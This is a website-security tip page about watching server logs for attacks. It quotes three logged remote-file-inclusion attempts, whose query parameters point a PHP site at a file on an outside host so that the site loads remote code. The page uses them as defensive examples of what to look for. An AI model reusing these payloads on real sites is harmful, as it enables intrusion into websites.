Premium Member Database last update: Tuesday, December 18, 2018 14:03:20 GMT-0700

Be Paranoid About Your Website Traffic

Tip #5

Be Paranoid About Your Website Traffic

Website hacks happen on one of two ways, from external sources or internal sources. You?ve established strong passwords, validated user input, kept your software updated and limited viewable personal and business data. You?re paranoid and off to a great start. But now you need to monitor your website traffic.

Whether you are on a Windows Server, a flavor of Unix and Apache, all servers create several types of traffic logs. These logs can provide lots of information including smtp access, password crack attempts, and website access and error logs.

Website logs are your friends. Use them. If you don?t have access to these logs contact your hosting company and find out what they have available for your use. If your site gets little traffic, examining the logs manually will be easy.

A typical log will include data about your visitors including IP Address, http queries, browser type and much more. Look for poisoned queries.

A typical line in your log might look like this:

255.255.255.255 - - [17/Sep/2009:13:39:00 -0500] "GET / HTTP/1.1" 200 72285 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

With the exception of the IP Address there is nothing wrong with the above.

But maybe you will come across some cross-site attacks like these:

94.23.197.26 - - [17/Sep/2009:12:00:25 -0500] "GET /index.php?Language=http: // tmsabogados . com . ar/img/back.gif??? HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" 70.85.146.66 - - [17/Sep/2009:07:48:32 -0500] "GET // index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http : // dogstudio . net/ampoll/idxx.txt?? HTTP/1.1" 302 - "-" "Mozilla/5.0"

65.92.200.221 - - [17/Sep/2009:13:34:25 -0500] "GET /subcategory_products.php?category= http : // 217.218.225.2 :2082 /index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

Each one of the above connections is a hack attempt. Each attack attempts to inject data stored on a possibly innocent website into another website.

These are real world attacks.

If your website or business has significant traffic then you may need to automate your log researcher. There are many free and commercial grade log parsers that will examine and cull data from your log files, alerting you to ongoing or potential problems. Google "log parsers" and find one you trust.

When researching your logs look to see what directories are being visited or scanned. Don?t leave security vulnerable data hanging around on your website or servers. Passwords protect directories. Exercise

extreme caution with writeable directories or files. Can these files or directories be accessed and written to from the outside?

A good rule of thumb is to deny for all, but allow for a select few. Secure content sensitive directories further by limiting access by user, password and IP address. There are several ways to accomplish this task using .htaccess, SQL, MySQL, PHP or ASP.

Use your logs to help you better respond and become more proactive to internet threats.

Next: Tip#6 Limit Your Exposure